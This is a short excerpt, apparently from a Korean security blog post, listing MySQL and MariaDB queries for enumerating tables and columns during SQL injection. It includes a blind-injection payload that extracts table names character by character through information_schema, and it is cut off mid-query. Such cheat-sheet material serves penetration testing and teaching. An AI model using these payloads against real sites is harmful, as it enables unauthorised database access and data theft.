보안
-
데이터베이스 별 DB 및 테이블 조회(for SQL Injection)보안 2021. 7. 27. 14:03
► 계속 업데이트할 예정 MySQL & MariaDB 테이블 수 조회 select count(table_name) from information_schema.tables where table_schema=database() database() : 현재 사용 중인 DB 명 반환, 없다면 NULL 테이블 명 조회 (blind injection) (select ascii(substr(table_name,자릿 수,1)) from information_schema.tables where table_schema=database() limit n번째 테이블,1) > 아스키코드 컬럼에 대한 정보 얻기 select length(column_name) from information_schema.columns where t..